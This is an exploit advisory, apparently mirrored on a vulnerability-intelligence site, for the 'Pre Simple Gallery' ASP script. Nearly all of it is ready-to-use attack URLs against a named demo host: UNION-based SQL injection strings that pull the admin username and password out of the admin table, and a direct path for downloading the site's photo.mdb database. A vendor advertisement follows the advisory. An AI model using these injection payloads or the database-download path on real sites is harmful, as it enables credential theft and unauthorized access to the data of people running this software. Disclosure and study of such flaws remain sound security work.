Pre Simple Gallery ASP Script SQL/DD Remote Vuln
`[~] Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns.
[~]
[~] script: http://preproject.com/projectDetail.asp?projectID=213
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dork: bende bilmiyorum arkadaslar olunca zaten bildiriyorum lutfen sormayIn ( รฝ dont know dork. pls you dont ask to me )
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exploit for demo:
you go this link:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin
right click to on photo and you must see
http://preproject.com/pgallery/pimages/4
column number 4
and you goo this links
username:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
password:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
so for demo:
username: admin
password: admin
exp for demo: (DD)
http://preproject.com/pgallery/database/photo.mdb
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo